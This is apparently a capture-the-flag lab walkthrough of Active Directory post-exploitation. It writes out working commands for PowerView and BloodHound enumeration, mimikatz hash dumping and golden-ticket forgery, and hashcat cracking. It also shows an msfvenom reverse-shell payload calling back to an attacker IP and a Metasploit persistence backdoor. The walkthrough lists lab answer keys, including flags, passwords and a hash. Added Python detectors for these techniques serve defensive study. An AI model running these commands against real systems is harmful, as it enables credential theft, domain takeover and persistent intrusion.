Post-Exploitation Basics - Easy
- Enumeration with Powerview
- Enumeration with Bloodhound
- Dumping hashes with mimikatz
- Golden Ticket Attacks with mimikatz
- Enumeration with Server Manager
- Maintaining Access
Enumeration with Powerview
- PowerView is a PowerShell script for enumerating a domain once you have a shell on a domain-joined system.
- Resources such as the PowerView CheatSheet list the most useful cmdlets.
```shell
ssh Administrator@10.10.199.137
#ssh into target machine
powershell -ep bypass
#bypass the PowerShell execution policy so scripts can run
. .\Downloads\PowerView.ps1
#dot-source PowerView into the current session
Get-NetUser | select cn
#enumerate domain users
#gives flag
Get-NetGroup -GroupName *admin*
#enumerate domain groups whose name contains "admin"
Invoke-ShareFinder
#find shares
Get-NetComputer -FullData
#return full info of computers (including operating system)
```
1. What is the shared folder that is not set by default? - Share
2. What operating system is running inside of the network besides Windows Server 2019? - Windows 10 Enterprise Evaluation
3. Find the flag. - POST{P0W3RV13W_FTW}
Enumeration with Bloodhound
- BloodHound is a GUI tool that visually maps the relationships in a domain.
- It is fed by SharpHound, a collector (comparable to PowerView) that gathers domain details into .json files for BloodHound to import.
```shell
#on attacker machine
sudo neo4j console
#start neo4j (BloodHound's database)
#on target machine
powershell -ep bypass
. .\Downloads\SharpHound.ps1
#dot-source SharpHound
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
#collect loot with SharpHound
dir
#check the loot file name
#on attacker machine
#copy loot file using scp
scp Administrator@10.10.199.137:C:/Users/Administrator/20220519113424_loot.zip ~/
bloodhound
#log in with the neo4j default creds (neo4j:neo4j) and change them
#once inside the BloodHound GUI, import the loot zip file
#use the built-in queries
```
1. What service is also a domain admin? - sqlservice
2. What two users are Kerberoastable? - sqlservice, krbtgt
Dumping hashes with mimikatz
```shell
#on target machine
cd Downloads
mimikatz.exe
privilege::debug
lsadump::lsa /patch
#dump hashes
#on attacker machine
#copy hashes into a file and crack them (-m 1000 = NTLM)
hashcat -m 1000 machine1hash.txt /usr/share/wordlists/rockyou.txt
```
1. What is the Machine 1 password? - Password1
2. What is the Machine 2 hash? - c39f2beb3d2ec06a62cb887fb391dee0
Golden Ticket Attacks with mimikatz
```shell
mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
#dump the krbtgt account hash and the domain SID
kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:
#sid, krbtgt and id to be filled from previous command
#use golden ticket to access other machines
misc::cmd
#cmd with elevated privileges
```
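Both mimikatz steps above leave traces a defender can key on: dumping hashes means opening lsass.exe with read access, and a golden ticket is a forged TGT presented straight to the ticket-granting service, so the domain controller never logged the TGT request that normally precedes a service-ticket request. The following is an added example written for this page, not code from the room or from mimikatz. It runs two detections over constructed events shaped after Sysmon Event ID 10 (ProcessAccess) and Windows Security 4768/4769 fields; the timestamps, hosts and the allowlist of legitimate LSASS readers are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not a real log export). Field names follow
# Sysmon 10 (ProcessAccess) and Security 4768 (TGT requested) / 4769
# (service ticket requested); the mimikatz.exe path mirrors the walkthrough.
EVENTS = [
    {"time": "2022-05-19T11:20:00", "log": "Sysmon", "id": 10,
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": 0x1000},
    {"time": "2022-05-19T11:34:00", "log": "Sysmon", "id": 10,
     "SourceImage": r"C:\Users\Administrator\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": 0x1010},
    {"time": "2022-05-19T09:00:00", "log": "Security", "id": 4768,
     "TargetUserName": "alice", "IpAddress": "10.10.10.21"},
    {"time": "2022-05-19T09:05:00", "log": "Security", "id": 4769,
     "TargetUserName": "alice@CONTROLLER.LOCAL", "IpAddress": "10.10.10.21",
     "ServiceName": "CONTROLLER$"},
    {"time": "2022-05-19T11:40:00", "log": "Security", "id": 4769,
     "TargetUserName": "Administrator@CONTROLLER.LOCAL", "IpAddress": "10.10.10.99",
     "ServiceName": "CONTROLLER$"},
]

# Images that legitimately read LSASS memory on a stock Windows host.
# This allowlist is an assumption; tune it for EDR agents and backup tools.
LSASS_READERS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}
PROCESS_VM_READ = 0x0010           # credential dumping needs this access right
TGT_LIFETIME = timedelta(hours=10)  # Kerberos default MaxTicketAge


def suspicious_lsass_access(events):
    """Sysmon 10 where a non-allowlisted image opened lsass.exe with an
    access mask containing PROCESS_VM_READ (mimikatz masks such as 0x1010,
    0x1410 or 0x1FFFFF all include it)."""
    hits = []
    for e in events:
        if e["log"] != "Sysmon" or e["id"] != 10:
            continue
        if not e["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        if e["SourceImage"].lower() in LSASS_READERS:
            continue
        if e["GrantedAccess"] & PROCESS_VM_READ:
            hits.append(e["SourceImage"])
    return hits


def _account(name):
    # 4769 usually records "user@REALM" while 4768 records the bare name
    return name.split("@")[0].lower()


def tgs_without_tgt(events):
    """4769 for which the same account and client IP has no 4768 within the
    TGT lifetime. A forged TGT skips the AS exchange, so the DC has a
    service-ticket request with no matching TGT request behind it."""
    last_tgt = {}
    hits = []
    for e in sorted(events, key=lambda x: x["time"]):
        if e["log"] != "Security":
            continue
        key = (_account(e["TargetUserName"]), e["IpAddress"])
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4768:
            last_tgt[key] = t
        elif e["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or t - seen > TGT_LIFETIME:
                hits.append((key[0], key[1], e["ServiceName"]))
    return hits


if __name__ == "__main__":
    for img in suspicious_lsass_access(EVENTS):
        print(f"[lsass access] {img}")
    for user, ip, svc in tgs_without_tgt(EVENTS):
        print(f"[TGS without TGT] {user} from {ip} -> {svc}")
```

Two caveats when running this on real data: the 4768/4769 pair must be correlated across every domain controller (the TGT can be issued by a different DC than the one that issues the service ticket), and the LSASS rule only fires if the Sysmon configuration actually records ProcessAccess events for lsass.exe.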
Enumeration with Server Manager
```shell
sudo vim /etc/hosts
#add the line "10.10.199.137 CONTROLLER.local" to /etc/hosts
rdesktop -u Administrator -p 'P@$$W0rd' -d CONTROLLER -v 10.10.199.137
#rdp to the target
```
We can now open Windows Server Manager and browse its tabs, mainly Tools and Manage.
Navigate to Tools > Active Directory Users and Computers, where the password for the SQL Service account is visible in the user's properties.
1. What tool allows to view the event logs? - Event Viewer
2. What is the SQL Service password? - MYpassword123#
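The enumeration sections above (PowerView, BloodHound and Server Manager) surface three misconfigurations: a service account that is also a domain admin, accounts with SPNs that are Kerberoastable, and a password parked in a user attribute that Active Directory Users and Computers displays. A defender would audit for exactly these before anyone enumerates them. The following is an added example written for this page, not code from the room or from PowerView/BloodHound. It runs over a constructed list of user objects modelled on the lab domain; the simplified field names and the assumption that the SQL password sits in the description attribute are mine.

```python
import re

# Constructed directory objects modelled on the lab domain; not real AD output.
# "sam", "enabled", "spns", "groups" and "description" stand in for
# sAMAccountName, userAccountControl, servicePrincipalName, memberOf and description.
USERS = [
    {"sam": "Administrator", "enabled": True, "spns": [],
     "groups": ["Domain Admins"], "description": "Built-in account"},
    {"sam": "krbtgt", "enabled": False, "spns": ["kadmin/changepw"],
     "groups": ["Domain Users"],
     "description": "Key Distribution Center Service Account"},
    {"sam": "sqlservice", "enabled": True, "spns": ["MSSQLSvc/controller.local:1433"],
     "groups": ["Domain Admins", "Domain Users"],
     "description": "Password: <PLACEHOLDER, not the real value>"},
    {"sam": "alice", "enabled": True, "spns": [],
     "groups": ["Domain Users"], "description": "Finance"},
    {"sam": "svc_backup", "enabled": True, "spns": ["backup/controller.local"],
     "groups": ["Domain Users"], "description": "Backup agent"},
]

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Schema Admins", "Account Operators"}
# "password:", "passwd =", "pwd:" and similar inside a free-text attribute
SECRET_PATTERN = re.compile(r"\b(pass(word|wd)?|pwd)\b\s*[:=]", re.IGNORECASE)


def kerberoastable(users):
    """Any user object with an SPN: every domain user can request a service
    ticket for it and crack that ticket offline. krbtgt shows up here for
    the same reason BloodHound lists it."""
    return sorted(u["sam"] for u in users if u["spns"])


def privileged_service_accounts(users):
    """SPN plus privileged group membership: one cracked service ticket
    yields domain admin, which is what makes sqlservice the real finding."""
    return sorted(u["sam"] for u in users
                  if u["spns"] and PRIVILEGED_GROUPS.intersection(u["groups"]))


def passwords_in_description(users):
    """Description is readable by every authenticated user, so a password
    stored there is exposed to anyone with a domain foothold."""
    return sorted(u["sam"] for u in users if SECRET_PATTERN.search(u["description"]))


def audit(users):
    return {
        "kerberoastable": kerberoastable(users),
        "privileged_service_accounts": privileged_service_accounts(users),
        "password_in_description": passwords_in_description(users),
    }


if __name__ == "__main__":
    for finding, accounts in audit(USERS).items():
        print(f"{finding}: {', '.join(accounts) or 'none'}")
```

In a real domain the same attributes come from `Get-ADUser -Filter * -Properties servicePrincipalName,memberOf,description` exported to JSON. The fixes the checks point at are the usual ones: take the SQL service out of Domain Admins, give it a long random password or a group managed service account, and clear the description field.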
Maintaining Access
```shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.48.136 LPORT=4444 -f exe -o payload.exe
#generate payload
#transfer payload from attacker to target machine
#on attacker machine
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
#set required options (LHOST and LPORT must match the payload)
run
#get meterpreter shell
background
use exploit/windows/local/persistence
set session 1
#persistence module creates a backdoor
```
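The persistence module's backdoor survives reboots because it is registered to start at logon, which is also where a defender looks for it. Here is an added example written for this page (not Metasploit's code) that parses a constructed `reg query` style dump of a Run key and flags autoruns that point at script files, launch through a script host, or live in user-writable staging folders. The entry names and paths are made up for the example, and the three heuristics are my assumptions, not a complete list.

```python
import re

# Constructed dump in the shape `reg query HKCU\...\Run` prints; not from a real host.
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive        REG_SZ           "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    bFhyqtAf        REG_SZ           C:\Users\Administrator\AppData\Local\Temp\rDPRfz.vbs
    Updater         REG_SZ           wscript.exe //B C:\Users\Public\update.vbs
    SecurityHealth  REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

ENTRY_RE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.+?)\s*$")
# Heuristics: script payloads, script interpreters, and directories any user can write to.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)\b", re.IGNORECASE)
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh|cmd)(\.exe)?\b", re.IGNORECASE)
STAGING_DIRS = re.compile(r"\\(temp|tmp|public|downloads)\\", re.IGNORECASE)


def parse_run_key(dump):
    """Turn the textual dump into {name, type, command} records; the key
    path line and blank lines do not match the entry pattern and are skipped."""
    entries = []
    for line in dump.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"name": m.group(1), "type": m.group(2), "command": m.group(3)})
    return entries


def suspicious_autoruns(entries):
    """Return (name, reasons) for every entry that trips at least one heuristic.
    Signed binaries under Program Files / system32 trip none of them, which is
    what keeps OneDrive and SecurityHealth out of the result."""
    findings = []
    for e in entries:
        cmd = e["command"]
        reasons = []
        if SCRIPT_EXT.search(cmd):
            reasons.append("script file")
        if SCRIPT_HOSTS.search(cmd):
            reasons.append("script host")
        if STAGING_DIRS.search(cmd):
            reasons.append("user-writable staging dir")
        if reasons:
            findings.append((e["name"], reasons))
    return findings


def flagged_names(dump):
    return [name for name, _ in suspicious_autoruns(parse_run_key(dump))]


if __name__ == "__main__":
    for name, reasons in suspicious_autoruns(parse_run_key(RUN_KEY_DUMP)):
        print(f"{name}: {', '.join(reasons)}")
```

The same heuristics apply to the HKLM Run/RunOnce keys, scheduled tasks and the Startup folder; on a real host, feed each of those listings through `parse_run_key` after adjusting the entry pattern, and compare anything flagged against the file's signature and creation time.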